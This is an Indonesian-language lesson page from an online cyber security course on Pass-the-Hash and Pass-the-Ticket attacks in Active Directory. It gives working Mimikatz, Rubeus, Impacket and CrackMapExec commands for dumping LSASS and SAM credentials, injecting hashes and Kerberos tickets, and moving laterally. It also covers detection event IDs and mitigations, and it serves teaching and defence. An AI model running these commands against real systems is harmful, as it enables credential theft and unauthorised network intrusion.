Serangan Pass-the-Hash dan Pass-the-Ticket
Gunakan hash kredensial dan tiket Kerberos untuk bergerak secara lateral tanpa mengetahui kata sandi teks asli.
Serangan Pass-the-Hash dan Pass-the-Ticket adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Alasan Serangan Ini Ada
Protokol kredensial Windows menyimpan rahasia autentikasi (hash NTLM, tiket Kerberos) di dalam memori. Penyerang dengan hak SYSTEM dapat mengekstrak rahasia ini dan menggunakannya kembali untuk mengautentikasi sebagai pengguna lain tanpa mengetahui kata sandinya.
Mengekstrak Hash NTLM dengan Mimikatz
Mimikatz adalah alat ekstraksi kredensial terkemuka di Windows. Jika dijalankan sebagai SYSTEM/Administrator, alat ini membaca memori proses LSASS untuk mengekstrak hash NTLM dan kredensial teks biasa.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samMeneruskan Hash (PtH) dengan Mimikatz
PtH menyuntikkan hash NTLM ke dalam sesi baru tanpa mengetahui kata sandi teks biasa. Hash tersebut mengautentikasi ke layanan jarak jauh menggunakan NTLM — efektif untuk pergerakan lateral ke host Windows lain.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userMeneruskan Hash dengan Impacket
Impacket menyediakan alat Python untuk PtH: psexec.py, smbexec.py, dan wmiexec.py menerima hash NTLM secara langsung untuk menjalankan perintah dari jarak jauh.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cMengekstrak Tiket Kerberos
Tiket Kerberos juga disimpan di dalam memori LSASS. Mimikatz mengekstraknya; Rubeus adalah alat khusus untuk operasi tiket Kerberos di Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtMeneruskan Tiket (PtT)
PtT menyuntikkan tiket Kerberos yang dicuri ke dalam sesi saat ini. Tiket tersebut mengautentikasi ke layanan sebagai pemilik asli tiket — tidak diperlukan hash atau kata sandi.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistMengekstrak LSASS dari Jarak Jauh
Setelah memperoleh pijakan awal, ekstrak LSASS dari jarak jauh menggunakan CrackMapExec atau secretsdump milik Impacket — sesi interaktif pada target tidak diperlukan.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Jalur Pergerakan Lateral
Setelah memperoleh hash atau tiket, lakukan pergerakan lateral: gunakan PtH ke mesin lain dengan memanfaatkan kembali administrator lokal, gunakan PtT untuk mengakses layanan domain, lalu tingkatkan hak menuju administrator domain dengan menargetkan akun berhak istimewa.
Mendeteksi PtH dan PtT
Pihak pertahanan mendeteksi PtH melalui: ID Peristiwa 4624 (masuk) dengan jenis masuk 3 tanpa adanya masuk interaktif yang sesuai, anomali autentikasi NTLM, serta tanda-tanda Mimikatz di dalam memori atau pada disk.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useMitigasi
Mitigasi utama: aktifkan Credential Guard (melindungi LSASS dengan virtualisasi), batasi penggunaan kembali administrator lokal di seluruh mesin (LAPS), wajibkan grup Protected Users untuk akun berhak istimewa, dan nonaktifkan NTLM jika memungkinkan.
Overpass-the-Hash
Overpass-the-Hash mengubah hash NTLM menjadi TGT Kerberos. Teknik ini berguna di lingkungan yang memblokir NTLM tetapi menyediakan Kerberos, atau ketika Anda memerlukan TGT untuk serangan Kerberos berikutnya.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Pemeriksaan Singkat
Fitur keamanan Windows apa yang melindungi penyimpanan kredensial LSASS menggunakan virtualisasi?
Ringkasan: PtH dan PtT
Meneruskan Hash dan Meneruskan Tiket merupakan dasar pergerakan lateral dalam Active Directory. Keduanya memanfaatkan penyimpanan kredensial Windows di LSASS. Mimikatz dan Impacket mempermudah ekstraksi serta penggunaan kembali kredensial. Lakukan pertahanan dengan Credential Guard, LAPS, grup Protected Users, dan pemantauan ketat terhadap peristiwa autentikasi NTLM serta Kerberos.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Serangan Pass-the-Hash dan Pass-the-Ticket” gratis?
Ya — teks lengkap “Serangan Pass-the-Hash dan Pass-the-Ticket” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Serangan Pass-the-Hash dan Pass-the-Ticket”?
Gunakan hash kredensial dan tiket Kerberos untuk bergerak secara lateral tanpa mengetahui kata sandi teks asli. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.
Berapa lama pelajaran “Serangan Pass-the-Hash dan Pass-the-Ticket” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Autentikasi Windows: NTLM dan Kerberos
- Serangan Pass-the-Hash dan Pass-the-Ticket
- Kerberoasting dan AS-REP Roasting
- Penguatan Active Directory